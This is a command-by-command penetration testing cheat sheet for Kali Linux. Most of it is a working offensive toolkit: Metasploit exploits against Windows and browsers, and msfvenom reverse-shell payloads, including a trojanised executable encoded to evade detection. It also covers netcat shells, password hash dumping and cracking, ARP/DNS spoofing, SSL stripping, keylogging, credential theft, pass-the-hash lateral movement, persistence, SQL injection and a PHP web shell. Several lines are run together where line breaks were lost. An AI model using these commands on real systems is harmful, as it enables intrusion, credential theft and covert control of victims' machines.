Applications to download:
Nessus - security scanner
http://www.tenable.com/products/nessus-home
Running application daemon:
/etc/init.d/nessusd start
Configuration:
https://kali:8834/
After first application's startup it displays an interface for creating user to log to the application.
Next it displays a form for input activation key which is sent to the email submitted during registration
process on the producer's webpage.
Next application makes its initialization, downloads signature database and configures the signatures.
This process can take long amount of time and uses average 100% of CPU's time, so be prepared to wait quite a long.
I started the process in the late evening just before going asleep and when i woke up in the morning the application
was ready for working.
mingw-w64 - provides 64-bit Windows programmes compilation in Linux environment:
Make sure that in /etc/apt/sources.list config file are available following repositories:
# Regular repositories
If not then paste them in and install application with following commands:
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
apt-get clean
apt-get update
apt-get upgrade
apt-get install mingw-w64
Tests if specified port (5500) is opened on the remote machine:
nc -v 192.168.10.1 5500
Tests if sending FIN packet to closed port not results in receiving RST/ACK packet:
sudo nmap -sF
Tests if sending ACK packet which is not part of established session will not cause receiving response:
sudo nmap -sA
Tests if specified UDP port (5500) is opened on the remote machine:
sudo hping3 -2 -p 5500 192.168.8.100
Tests if sending icmp echo response for an icmp echo request that was not sent by a remote machine will not cause receiving response:
sudo hping3 -1 --icmptype echo-reply 192.168.8.100
Sends one icmp echo packet to a remote host:
ping -c 1 192.168.8.100
Sends an icmp echo packet without data after its header to a remote host:
sudo nmap -sP 192.168.8.100
or:
ping -s 0 192.168.8.100
Broadcast addresses:
224.0.0.0 - 239.255.255.255
TCP connect scanning of a specified machine (root privileges are not required):
nmap -P0 -sT 192.168.8.100
or:
nmap -sT -n 192.168.8.100 --max-rtt-timeout 500ms
TCP SYN scanning of a specified machine:
sudo nmap -P0 -sS 192.168.8.100
or (without option specifying scanning type, because TCP SYN scanning is a default one):
sudo nmap -n 192.168.8.100 --max-rtt-timeout 500ms
TCP FIN scanning of a specified machine:
sudo nmap -P0 -sF 192.168.8.100
TCP XMAS scanning of a specified machine:
sudo nmap -P0 -sX 192.168.8.100
TCP NULL scanning of a specified machine:
sudo nmap -P0 -sN 192.168.8.100
TCP ACK scanning of a specified machine:
sudo nmap -P0 -sA 192.168.8.100
Scans UDP ports of a specified machine:
sudo nmap -P0 -sU 192.168.8.100
or:
sudo nmap -sU -n 192.168.8.100 --max-rtt-timeout 500ms
Scans specified network for opened SSH port:
sudo nmap -P0 -p 22 -sS 192.168.8.0/24
Detects a service version listening on a specified common port (80):
sudo nmap -sV -P0 -p 80 -n 192.168.8.100
TCP SYN scanning of a specified machine (192.168.8.100) with 10.0.0.1 address as a source address using eth0 interface:
sudo nmap -P0 -sS -S 10.0.0.1 -e eth0 192.168.8.100
Runs netcat as a TCP server listening on port 5001. The program is awaiting for data sent by network and after receiving it
dumps it on the standard output and closes down:
nc -l 5001
Runs netcat as a UDP server listening on port 5002. The program is awaiting for data sent by network and after receiving it
dumps it on the standard output and closes down:
nc -u -l 5002
Sends a text specified after echo command to the TCP server listening on the port 5001 on the specified remote machine using nc (netcat) program:
echo "To jest napis 12345" | nc 192.168.8.100 5001
Sends 10 bytes of 0xa5 to the UDP server listening on the port 5002 on the specified remote machine using nc (netcat) program:
perl -e 'print "\xa5"x10' | nc -u 192.168.8.100 5002
Restarts networking service (ex. after changes made in /etc/network/interfaces file)
service networking restart
Runs netcat application in server mode listening on port 1234:
nc -lvtp 1234
Sends data to server listening on 1234 port on 127.0.0.1 (localhost) machine:
nc -vt 127.0.0.1 1234
Runs netcat as a server listening on 1234 port. Every incoming line of text is processed by shell
/bin/sh and the result is send back to the client:
nc -lvtp 1234 -e /bin/sh
Runs netcat as a client connecting with server listening on port 1234 of localmachine and provides to the server
possibility of executing client's shell commands and obtaining results of that commands:
nc -vt 127.0.01 1234 -e /bin/sh
Runs postgresql server service:
systemctl start postgresql
Initializes database for metasploit:
msfdb init
Runs metasploit console:
msfconsole
Searches metasploit's database for exploit that takes advantage of vulnerability with specified code-number (ms08-067):
msf> search ms08-067
Displays specified exploit's details:
msf> info exploit/windows/smb/ms08_067_netapi
Switches metasploit console context to the specified exploit's module:
msf> use windows/smb/ms08_067_netapi
Displays options necessary for running selected module/exploit:
msf exploit(ms08_067_netapi)> show options
Sets value of specified option (here RHOST):
msf exploit(ms08_067_netapi)> set RHOST 192.168.10.100
Displays operating systems that are vulnerable for the selected module/exploit:
msf exploit(ms08_067_netapi)> show targets
Sets target operating system (the number is taken from the list generated by the "show targets" command):
msf exploit(ms08_067_netapi)> set target numer
Displays payloads that are compatible with selected module/exploit:
msf exploit(ms08_067_netapi)> show payloads
Runs selected exploit:
exploit
Exits the meterpreter shell that was ran after successful break in to the victim system:
meterpreter> exit
Selects payload of type reverse shell for the module/exploit:
msf exploit(ms08_067_netapi)> set payload windows/shell_reverse_tcp
Exits msfconsole console:
msf exploit(ms08_067_netapi)> exit
Program that generates payloads for Metasploit:
msfvenom -h
Displays available payloads list:
msfvenom -l payloads
Displays options available for selected payload (windows/meterpreter/reverse_tcp):
msfvenom -p windows/meterpreter/reverse_tcp --payload-options
Displays available payload formats:
msfvenom --help-formats
Generates payload.exe executable that runs meterpreter shell connecting with specified host on specified port:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.101 LPORT=443 --platform windows --arch x86 -f exe >payload.exe
Generates program which handles connections incoming from the victim's systems that executed payload.exe file generated above:
msfconsole
The last line of snippet above creates process listening on 443 port.
msf> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.10.101
msf exploit(handler)> set LPORT 443
msf exploit(handler)> exploit
Uses auxiliary scanner/smb/pipe_auditor module to display list of streams that listen on SMB server on remote machine:
msf> use scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor)> set RHOSTS 192.168.10.100
msf auxiliary(pipe_auditor)> exploit
Shell command that updates modules/exploits Metasploit's database:
msfupdate
Displays all scripts (in /usr/share/nmap/scripts directory) belonging to 'default' category:
nmap --sript-help default
Displays details on specified script (here nfs-ls):
nmap --sript-help nfs-ls
Scans specified host to reveal opened ports and runs all scripts belonging to 'default' category on each of ports found:
nmap -sC 192.168.10.100
or (counterpart):
nmap --script=default 192.168.10.100
Scans specified host to reveal opened ports and runs specified (nfs-ls) script on each of ports found:
nmap --script=nfs-ls 192.168.10.100
Runs Metasploit console ang checks if on specified hosts (192.168.10.100-192.168.10.110 i 192.168.56.1) is listening ftp
service and if it allows for anonymous access:
msfconsole
msf> use scanner/ftp/anonymous
msf> set RHOSTS 192.168.10.100-110 192.168.56.1
msf> exploit
Checks if specified host is vulnerable for selected exploit without running the one:
msfconsole
msf> use windows/smb/ms08_067_netapi
msf> set RHOST 192.168.10.100
msf> check
Checks website on specified host for known vulnerabilities:
nikto -h 192.168.10.100
Attempts to log in to the WebDAV panel on specified host using default credentials:
cadaver http://192.168.10.100/wedav
Sends to the remote machine text.txt file:
dav:/webdav/> put test.txt
Checks mail server if specified user exists:
nc 192.168.10.100 25
VRFY username
^D
Turns on ip packets forwarding on current machine (ex. 192.168.10.101) and poisons arp cache of 192.168.10.100 host to
make it think that 192.168.10.101 is now 192.168.10.110:
echo 1 > /proc/sys/net/ipv4/ip_forward
Now do the trick for 192.168.10.110 to make it think that 192.168.10.101 is 192.168.10.100 (from now 192.168.10.101
forwards packets between 192.168.10.100 <=> 192.168.10.110):
arpspoof -i eth0 -t 192.168.10.100 192.168.10.110arpspoof -i eth0 -t 192.168.10.110 192.168.10.100
Translates specified domain address to IP address:
nslookup www.google.pl
Poisons DNS with dnsspoof command:
cat hosts.txt
192.168.10.101 www.google.pl
dnsspoof -i eth1 -f hosts.txt
Catches all network traffic between 192.168.10.1 gateway and 192.168.10.110 host:
ettercap -Ti eth0 -M arp:remote /192.168.10.1/ /192.168.10.110/
Carry SSL Stripping attack out:
iptables -t nat -A PREROUTING -p tcp-destination-port 80 -j REDIRECT -to-port8080sslstrip -l 8080
Generates php script that opens meterpreter shell after visiting webpage containing the script. The script opens no extra
window and connects to the specified host (192.168.56.101) on specified port number (2323):
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=2323 -f raw >meterpreter.php
Runs listening process to catch connections from script described above:
msfconsole
After connection made we can query for current username:
msf> use multi/handler
msf> set payload php/meterpreter/reverse_tcp
msf> set LHOST 192.168.56.101
msf> set LPORT 2323
msf> exploitmeterpreter> getuid
Also we can dump password hashes of the victim windows system:
meterpreter> hashdump
Make mysql to write arbitrary script onto the victim machine:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"
Searching Metasploit's module/exploits database for specified system:
msf> search drupal
Obtaining information about specified module/exploit:
msf> info unix/webapp/php_xmlrpc_eval
Searches specified website (progmar.net.pl) and all sublinked websites with max 1-level nesting for
minimum 5-length words and saves them to passwords.txt file:
cewl -w passwords.txt -d 1 -m 5 progmar.net.pl
Generates 7- and 8-length password dictionary. Each entry consists of A or B letters:
crunch 7 8 AB
Guesses users and their passwords on specified POP3 server:
hydra -L userlist.txt -P passwords.txt 192.168.56.1 pop3
Guesses password of user mzaleczny on specified POP3 server:
hydra -l mzaleczny -P passwords.txt 192.168.56.1 pop3
In Windows operating system in c:\windows\repair directory exists following files:
sam - contains encrypted user names and hashes of their passwords
system - contains system key used to encrypt data in file above.
Actual/Production versions of files above sit in c:\windows\system32\config directory.
To extract user names and their passwords run following ommands:
bkhive system xpkey.txt
The result of commands above (or result of command "meterpreter> hashdump" described above) save
to a file "ntpasswords.txt" and issue following command to guess passwords:
samdump2 sam xpkey.txtjohn ntpasswords.txt
John program can be used to guess linux user's passwords:
john linux_passwords.txt -wordlist dictionary.txt
Metasploit AllPorts payload is used to make a connection on first port number that is not filtered by a firewall.
To do this there are checked all ports starting from 1:
msf exploit(ms08_067_netapi)> set payload windows/shell/reverse_tcp_allports
msf exploit(ms08_067_netapi)> show options
msf exploit(ms08_067_netapi)> exploit
Aurora exploit uses IE vulnerability to make a connection with a remote system and gain access to the system shell:
msf> use explit/windows/browser/ms10_002_aurora
Now when victim visits http://192.168.1.101/aurora address in his IE browser, the exploit will be fired and
attacker owning 192.168.1.101 host will gain access to victim's OS shell.
msf exploit(ms10_002_aurora)> show options
msf exploit(ms10_002_aurora)> set SRVHOST 192.168.1.101
msf exploit(ms10_002_aurora)> set SRVPORT 80
msf exploit(ms10_002_aurora)> set URIPATH aurora
msf exploit(ms10_002_aurora)> set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora)> set LHOST 192.168.1.101
msf exploit(ms10_002_aurora)> exploit
Connects to specified session:
msf exploit(ms10_002_aurora)> sessions -i SESSION_ID
Displays jobs running in background in Metasploit's console:
msf exploit(ms10_002_aurora)> jobs
Kills a job of specified ID in Metasploit's console:
msf exploit(ms10_002_aurora)> kill JOB_ID
Displays advanced parameters for selected module/exploit:
msf exploit(ms10_002_aurora)> show advanced
Make migrate.rb script with parameter -f to be automatically executed after successful connection with victim host.
It moves Meterpreter shell into newly started notepad process in the host (thanks to it we do not lose the connection
after closing up hanged IE):
msf exploit(ms10_002_aurora)> set AutoRunScript migrate -f
Alternatively we can set advanced parameter "PrependMigrate" to true. It will do shell migration into newly created
process yet before exploit fire.
msf exploit(ms10_002_aurora)> exploit
Prepare malicious pdf and listening for callback connections:
msf> use exploit/windows/fileformat/adobe_utilprintf
Catching connections from victim hosts:
msf exploit(adobe_utilprintf)> show options
msf exploit(adobe_utilprintf)> exploit
msf exploit(adobe_utilprintf)> cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf)> systemctl start apache2msf exploit(adobe_utilprintf)> use multi/handler
We run our handler as a background process:
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.1.101
msf exploit(handler)> set ExitOnSession falsemsf exploit(handler)> exploit -j
Exploit for web browser with Java < 7 Update 11:
msf> use exploit/multi/browser/java_jre17_jmxbean
msf exploit(java_jre17_jmxbean)> set SRVHOST 192.168.1.101
msf exploit(java_jre17_jmxbean)> set SRVPORT 80
msf exploit(java_jre17_jmxbean)> set URIPATH javaexploit
msf exploit(java_jre17_jmxbean)> set payload java/meterpreter/reverse_http
msf exploit(java_jre17_jmxbean)> set LHOST 192.168.1.101
msf exploit(java_jre17_jmxbean)> exploit
Applet exploit for web browser with Java:
msf> use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet)> set APPLETNAME CustomAppletName
msf exploit(java_signed_applet)> set SRVHOST 192.168.1.101
msf exploit(java_signed_applet)> set SRVPORT 80
msf exploit(java_signed_applet)> set URIPATH javaappletexploit
msf exploit(java_signed_applet)> set target 0
msf exploit(java_signed_applet)> set payload java/meterpreter/reverse_tcp
msf exploit(java_signed_applet)> set LHOST 192.168.1.101
msf exploit(java_signed_applet)> exploit
Module recognizing web browser and applying all available exploits that might be successfull:
msf> use auxiliary/server/browser_autopwn
Displays all sessions with active shell running at victim computers:
msf auxiliary(browser_autopwn)> set LHOST 192.168.1.101
msf auxiliary(browser_autopwn)> set URIPATH autopwn
msf auxiliary(browser_autopwn)> exploitmsf auxiliary(browser_autopwn)> sessions -l
Program fo making social enginering attacks (sending malicious code in attachments to e-mails, creating
phishing webpages, etc. - it is installed in Kali Linux by default):
setoolkit
In Kali Linux in /usr/share/windows-binaries directory there are stored a few executables that can be used to
hold malicious payloads (it may be also any other windows exe binaries). Here is how to prepare a trojan:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444
-x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe
Process listening for incoming connections from meterpreter shells, we run in Metasploit console by using handler module:
msfconsole
msf> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.1.101
msf exploit(handler)> set LPORT 4444
msf exploit(handler)> exploit
Command working as above but it it also runs 10 iterations of payload ciphering with x86/shikata_ga_nai encoder:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444
-x /usr/share/windows-binaries/radmin.exe -e x86/shikata_ga_nai -i 10 -k -f exe >radmin_coded.exe
Displays list of encoders supperted by msfvenom program:
msfvenom -l encoders
Multiple ciphering a payload with some different encoders:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444
-e x86/shikata_ga_nai -i 10 -f raw >radmin_coded.bin
msfvenom -p - -x /usr/share/windows-binaries/radmin.exe -k -f exe -a x86 --platform windows
-e x86/bloxor -i 2 >radmin_coded2.exe <radmin_coded.bin
Generates a payload as a text string in C language:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f c >radmin.c
Generates random text string of 512 length:
cat /dev/urandom | tr -dc A-Z-a-z-0-9 | head -c512
Ciphers input.exe executable with hyperion.exe program and saves it to output.exe executable:
wine hyperion.exe input.exe output.exe
Installs and runs a tftpd server in Kali Linux:
apt-get install atftpd
Downloads plik.txt file from remote server to windows machine running cmd shell:
systemctl start atftpdtftp -i 192.168.1.101 GET plik.txt
Pobieranie pliku z maszyny z windowsem za pomocą powłoki cmd:
Uploads plik.txt file from windows machine running cmd shell to remote server:
tftp -i 192.168.1.101 PUT plik.txt
Meterpreter scripts reside in /usr/share/metasploit-framework/scripts/meterpreter directory.
To run a script issue following command:
meterpreter> run script-name
A script help you can obtain as below:
meterpreter> run script-name -h
Displays a running in processes list:
meterpreter> ps
Moves a meterpreter session into a process with id 1234:
meterpreter> run migrate -p 1234
Moves a meterpreter session to run as a background job:
meterpreter> background
Obtains logged users list of specified session in the system:
msf> use post/windows/gather/enum_logged_on_users
msf post(enum_logged_on_users)> set SESSION 1
msf post(enum_logged_on_users)> exploit
Calling any WinAPI function for example to check if current user is an admin:
msf> sessions -i 1
meterpreter> irb
>> client.railgun.shell32.IsUserAdmin
>> exit
Runs a bucket of exploits until to get user with SYSTEM privileges or to exhaust exploits:
meterpreter> getsystem
meterpreter> getuid
Returns to previous user privileges:
meterpreter> rev2self
Runs exploit for Windows XP SP2/SP3 system to leverage user privileges:
msf> use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf)> set SESSION 1
msf exploit(ms11_080_afdjoinleaf)> set payload windows/meterpreter/reverse_tcp
msf exploit(ms11_080_afdjoinleaf)> set LHOST 192.168.1.101
msf exploit(ms11_080_afdjoinleaf)> exploit
Bypasses UAC (User Account Control) in Windows 7:
msf> use exploit/windows/local/bypassuac
The commands above open meterpreter session with UAC disabled so the command below should work properly:
msf exploit(bypassuac)> set SESSIoN 1
msf exploit(bypassuac)> exploit
meterpreter> getuidmeterpreter> getsystem
Enters to Linux shell within the meterpreter session (of course the Linux system should work on compromised machine):
meterpreter> shell
And issuing some basic commands:
> whoami
> uname -a
> lsb_release -a
> udevadm --version
Searches local exploits database for udev program:
/usr/share/exploitdb/searchsploit udev
Runs nc as a server listening on 12345 port:
nc -lvp 12345
Connects to netcat working as above and attaches shell as a program handling standard input:
nc 127.0.0.1 12345 -e /bin/bash
From now within the first of the couple commands above you can issue linux shell commands that will be executed remotely:
Searches for files containing phrase password in their names from within meterpreter session:
meterpreter> search -f password
Runs embedded in meterpreter key-logger:
meterpreter> keyscan_start
Displays catched keypresses:
meterpreter> keyscan_dump
Stops key-logger:
meterpreter> keyscan_stop
Catching passwords stored by WinSCP application in Windows system:
msf> use post/windows/gather/credentials/winscp
msf post(winscp)> set session 1
msf post(winscp)> exploit
Displays list of users in Windows system:
cmd c:\> net users
Displays list of local admins in Windows system:
cmd c:\> net localgroup Administrators
After intercepting one Windows host you can try to intercept other hosts in the domain by using psexec exploit:
msf> use exploit/windows/smb/psexec
msf exploit(psexec)> set RHOST 192.168.1.102
msf exploit(psexec)> set SMBUser username
msf exploit(psexec)> set SMBPass userpassword
msf exploit(psexec)> set SMBDomain GRUPA_ROBOCZA
msf exploit(psexec)> exploit
Uses psexec module/exploit to log into a remote host knowing only hash of real password:
msf exploit(psexec)> set SMBPass password_LM_or_NTLM_hash
msf exploit(psexec)> exploit
Runs sshexec module/exploit to log into a remote Linux host:
msf> use exploit/multi/ssh/sshexec
msf exploit(sshexec)> set RHOST 192.168.1.102
msf exploit(sshexec)> set USERNAME user_name
msf exploit(sshexec)> set PASSWORD my_password
msf exploit(sshexec)> set payload linux/x86/meterpreter/reverse_tcp
msf exploit(sshexec)> set LHOST 192.168.1.101
msf exploit(sshexec)> exploit
meterpreter> getuid
meterpreter> shell
> whoami
Loads incognito module to handle tokens in Windows system:
msf> load incognito
Lists in meterpreter shell list of available tokens:
meterpreter> list_tokens -u
Obtains specified user's privileges (associated to given 'COMPXP\\username' token):
meterpreter> impersonate_token COMPXP\\username
Starts smb server in Windows domain environment that listens at 445 port and saves user password hashes to
the /root/johnpwfile file:
msf> use auxiliary/server/capture/smb
Next you can initiate smb connections with 192.168.1.100 fake host from within compromised machine:
msf auxiliary(smb)> set JOHNPWFILE /root/johnpwfile
msf auxiliary(smb)> exploitmeterpreter> shell
C:\windows\system32> net use \\192.168.1.100\anything
Displays network configuration of host running meterpreter shell:
meterpreter> ifconfig
Redirects all network traffic to 192.168.80.0/24 network through session number 2 (that has connection with catched
router in the same network) - it is so called pivot:
msf> route add 192.168.80.0 255.255.255.0 2
Scans ports from within Metasploit shell:
msf> use scanner/portscan/tcp
msf auxiliary(tcp)> set RHOST 192.168.1.101
msf auxiliary(tcp)> exploit
Runs in Metasploit socks4a proxy server:
msf> use auxilary/server/socks4a
Now in /etc/proxychains.conf file change line:
msf auxiliary(socks4a)> set SRVPORT 4040
msf auxiliary(socks4a)> exploitsocks4 127.0.0.1 9050
to:
socks4 127.0.0.1 4040
From now you can run through the pivot network programmes outside the Metasploit by using proxychains application, ex:
root@kali:~# proxychains nmap -Pn -sT -sV -p 21,22,25,80,445
Creates new user (martin) and assigns it to the domain in domain environment:
C:\> net use martin mypassword /add /domain
Assigns user created above to the Administrators group:
C:\> net localgroup Administrators martin /add
Creates in catched Windows system VisualBasic script that is executed after each system start and is trying to connect
to attacker's host every 10 minutes:
meterpreter> run persistence -r 192.168.1.100 -p 12345 -X -i 600
Runs burpsuite application:
Applications -> Web Applications Analysis -> burpsuite
Server proxy configuration in Firefox:
Menu Edit -> Preferences -> Advanced
There you switch to "Network" tab and click "Settings" button. Server proxy configuration window should be opened.
Example of injecting arbitrary code using variables processed by webapplications:
http://someapp.pl/login.php?username=' OR '1'='1&password=' OR '1'='1
http://someapp.pl/item.php?id=4 or 1 in (show databases)
Automated extracting information about a database:
sqlmap -u "http://someapp.pl/item.php?id=4" --dump
Attempt to obtain access to shell in that there is running SQL Server:
sqlmap -u "http://someapp.pl/item.aspx?id=4" --os-shell
The method uses SQL Server xp_cmdshell command.
All Metasploit's exploits reside in following directory:
/usr/share/metasploit-framework/modules/exploits